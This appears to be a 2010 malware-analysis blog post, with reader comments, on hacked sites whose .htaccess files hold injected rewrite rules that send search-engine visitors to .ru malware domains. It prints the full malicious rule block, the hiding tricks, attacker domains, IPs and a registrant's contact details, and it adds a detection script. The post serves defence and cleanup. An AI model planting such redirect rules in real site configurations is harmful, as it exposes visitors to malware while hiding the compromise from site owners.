
Htaccess Redirect to Example.ru/dir/index.php

   14 Oct 10   Filed in Website exploits

Having read Sucuri’s article about the kirm-sky .ru attack, I decided to complement it with my own observations.

I started to track this website infection back in April. It has been active all these months.

Compromised sites redirect search engine traffic to malicious sites. The rest of the traffic is not affected, which helps hide the problem from webmasters, who rarely click on search results to open their own sites. However, the problem is easily detected by Google’s malware scanners, and many webmasters only learn about it when web browsers start blocking their sites.

Unmask Parasites can also detect the problem and report the malicious 301 redirect.

[Screenshot: 301 redirect to kirm-sky]

Conditional redirect rules

Hackers inject the following rewrite rules into .htaccess files:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://networkdevision .ru/targetfile/index.php [R=301,L]

The redirect rules are quite straightforward. All those RewriteCond lines check whether the visitor came from one of the listed sites (e.g. Google, Yahoo, Wikipedia, YouTube, Twitter, Flickr, etc.), and the last RewriteRule line redirects such visitors to a malicious site. Note that the patterns are unanchored substring matches, so a condition like .*ya.* or .*mail.* fires on any referrer containing those letters, not only on the intended sites.

.htaccess tricks

To hide these rules, hackers inject several screens of blank lines before the malicious code, and unless you scroll all the way down you may think that your .htaccess file doesn’t contain anything suspicious.

Another trick is to place this file above the site root. Many web servers are configured to take this upper-level directory into account. (You can read here how one webmaster learnt these tricks while searching for the malicious code.)
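As an added example (not code from the original post or from Unmask Parasites), a small Python scanner for the rules quoted above and the two hiding tricks: it reports a referer-conditioned RewriteRule that redirects off-site, records how many blank lines precede the first directive, and lists the .htaccess files in the document root and in the directories above it. The sample .htaccess, the malicious-example.invalid host and the own_hosts parameter are constructed for this example.

```python
import os
import re

# Constructed sample (not from any real site) modelled on the injected rules
# quoted above: screens of blank lines first, then referer-conditional rules
# that send search-engine visitors to an off-site /dir/index.php.
SAMPLE_HTACCESS = "\n" * 120 + """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://malicious-example.invalid/dir/index.php [R=301,L]
"""
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)\s*(?:\[([^\]]*)\])?", re.I)
TARGET_RE = re.compile(r"^https?://([^/\s]+)", re.I)  # absolute (off-site) targets
FLAG_RE = re.compile(r"(^|,)\s*(R|redirect)(=\d+)?\s*(,|$)", re.I)  # external redirect flag

def scan_htaccess_text(text, own_hosts=()):
    """One finding per RewriteRule that is guarded by HTTP_REFERER conditions
    and redirects (R flag) to an absolute URL whose host is not in own_hosts."""
    lines = text.splitlines()
    leading_blank = next((i for i, l in enumerate(lines) if l.strip()), len(lines))
    findings, pending = [], 0  # pending = referer conditions since the last rule
    for num, line in enumerate(lines, 1):
        if COND_RE.match(line):
            pending += 1
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target, flags = TARGET_RE.match(m.group(1)), m.group(2) or ""
        if (pending and target and FLAG_RE.search(flags)
                and target.group(1).lower() not in own_hosts):
            findings.append({"line": num, "host": target.group(1).lower(),
                             "referer_conditions": pending,
                             "leading_blank_lines": leading_blank})
        pending = 0  # RewriteCond lines apply only to the next RewriteRule
    return findings

def htaccess_candidates(docroot, levels_up=1):
    """.htaccess paths to inspect: every one under docroot plus the ones in the
    directories above it (hackers also drop the file above the site root)."""
    paths, d = [], os.path.abspath(docroot)
    for _ in range(levels_up):
        d = os.path.dirname(d)
        paths.append(os.path.join(d, ".htaccess"))
    for root, _dirs, files in os.walk(docroot):
        if ".htaccess" in files:
            paths.append(os.path.join(root, ".htaccess"))
    return [p for p in paths if os.path.isfile(p)]
```

Run scan_htaccess_text on the contents of each path returned by htaccess_candidates(docroot); a finding whose line number is far beyond the visible content of the file is the blank-line padding at work.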

URL pattern

The URLs of the malicious sites change quite often, but they all follow the same pattern: example.ru/dir/index.php, where example.ru is some malicious domain in the .ru TLD and dir is some random directory name. Here are examples of such URLs:


In April, hackers didn’t use directories in such URLs, though (e.g. cut-etc .ru/index.php).

Domains and servers

All these domains are registered by someone with the email address ivan-sushkin@yandex.ru and the phone number +7 926 3411572 (this personal information can be forged). The domains are registered in small batches, which you can identify by their similar names. E.g. ar-kirm .ru, kirmar .ru, sky-ar .ru and skykirm .ru were registered on September 22nd, and the most recent batch, which includes devisionnetwork .ru and networkdevision .ru, was registered just a few days ago, on October 10th.

Not only does this attack change the domain names of the malicious sites, it also changes the IP addresses of the servers hosting the malicious content (most likely they have to move when network administrators disconnect their servers after numerous abuse reports).

During the last six months they used servers with the following IP addresses:

  • 194 .79 .250 .54 — Vladivostok Zhek-universal Ltd (Russian Federation)
  • 109 .196 .134 .52 — Lomonosov Vline Ltd (Russian Federation)
  • 109 .196 .143 .89 — Moscow Vline Ltd (Russian Federation)
  • 91 .204 .48 .37 — S.point (Ukraine) – currently used

Malicious redirects on disabled sites

I noticed an interesting thing. Sometimes hosting providers temporarily shut down websites (either because of security problems or simply because the owner is late with a payment) and redirect visitors to a page that usually reads something like “The website you were trying to reach is temporarily unavailable.” The thing is, the hoster’s redirect has lower priority than the malicious redirect in the .htaccess file. As a result, despite all the hoster’s efforts, such disabled sites are still dangerous if people click on their links in search engine results.

Infection vector

Although David thinks it’s an osCommerce-specific attack, I’ve seen it on many sites that don’t use osCommerce. To my mind, the FTP vector is more probable. Moreover, many infected sites contain other types of malicious code at the same time, so it could be just a coincidence that David found this .htaccess exploit on hacked osCommerce sites. Or maybe hackers have started to diversify their infection methods; who knows. Please leave a comment below if you have any information that can prove either hypothesis.

To webmasters

In any case, it’s always a good idea to start by checking your own computer for malware. Then change all site passwords and keep them secure (don’t save them in your FTP clients; instead, you might want to try this KeePass trick). Finally, remove the malicious redirect rules from the .htaccess files. Additionally, check for the backdoor scripts mentioned by David, and make sure all third-party scripts are fully patched and properly hardened.

If your site is in Google’s blacklist, you’ll need to request a malware review.

Have your say

Did I miss anything? Your comments are welcome!

Reader's Comments (8)

  1.

    [...] This post was mentioned on Twitter by Denis, Rhonda Kreklau. Rhonda Kreklau said: Htaccess Redirect to Example.ru/dir/index.php – http://blog.unmaskparasites.com/2010/10/14/htaccess-redirect-to-example-rudirindex-php-2/ [...]

  2.

    Some more domain names and malicious redirect URLs:

    devision-panel .ru/crem/index.php
    network-devision .ru

  3.

    Hey,
    Thanks man, I’ve had my client’s osCommerce site hacked several times. Thinking of moving to Magento. What do you think?

  4.

    Hi
    I came here via your related update article which mentioned the redirect url http://landriver44 .ru/in.cgi?10 [R=301,L]

    I came across this one on a hacked osCommerce site but the search engine redirect .htaccess file was not in the public_html folder but was, in fact, one directory higher in the site root.

    Initial attempts to clear the site from Google met with failure, as I was only FTP’ing from the public_html folder and not higher.

  5.

    Have the same problem. Changed the owner of .htaccess to root and in several days the site was hacked once again. It seems like it is not just a FTP-hacking…

  6.

    Hi! This is happening to Joomla sites too. Every single month we get the same thing!!
    latest domain is: TEYLSOFT.RU
    and the user is the same one:
    ivan-sushkin@yandex.ru

    Even our HTML sites are redirected.

    My question is, what can be done to stop this person/s????
    What is the point? And why does he keep getting domains?

    thank you!!

  7.

    I do not keep the FTP password on my computer.
    I deleted all the htaccess files. The vulnerability I could not find. Help me.

  8.

    Okay folks, well I too have just experienced this htaccess redirect problem.

    I am running two types of self-hosted web servers for my wordpress sites, a mac-mini and a windows mini with wamp developer-pro.

    This has only happened on my windows server, which runs about 50 websites.

    All my traffic was being directed to a Russian site on each and every one of my websites on the Windows server, and I found that this occurred due to a second htaccess file that was being created in the webroot folder of every site, even non-functioning sites.

    By deleting this file (which has no file name btw), my site became clean, as tested with sucuri.

    http://sitecheck.sucuri.net/

    Anyway, I would delete the file, and it would however re-appear within the hour.

    I also noticed that this file would break my permalinks, so I would go in, re-save the permalinks (which fixed the problem), but guess what? A new htaccess file was being created immediately.

    This htaccess file by the way had redirects to a russian .ru site amongst others, but you had to scroll down the htaccess file to see these redirects.

    Anyway, I also noticed that my ftp server, although closed, was running from the taskmanager, and I couldn’t shut it.

    I started trying to find the file that was re-creating these htaccess files, but I could find no menacing looking file anywhere.

    So I decided to slowly move less important sites out of my server root and into a new temp folder, and it was then that I noticed that one site COULD NOT BE CUT and PASTED!

    So I started cutting and pasting individual folders/files within the site, until I came to the last remaining file, which gave me the following error when I tried to cut or delete.

    “Cannot delete because the file is open in httpd.exe”

    What was this file?

    Believe it or not, it was a font file, located in a plugin on the last placed website on my server.

    wampdeveloper>websites>www.website.com>webroot>wp-content>plugins>si-contact-form>captcha-secureimage>ttffonts>ahg-bold

    So I shut down apache, and then I was able to delete this file.

    But then, I could not start up Apache anymore, possibly because httpd.exe was calling this malicious file and could no longer find it.

    Right now I am in the process of re-installing wampdeveloperpro.

    I am having problems here too, because even though wampdeveloperpro has been shut down, the system will not let me delete it. I had to reboot in safe mode to delete and re-install.

    Luckily I have backups of all my sites, but I am not yet sure if I will encounter any more problems.

    BTW, I shut down access to the ftp server by closing port 21 on my firewall.

    Hope this helps and would be interested in any other users who have had malware problems on a windows/wampdeveloperpro server.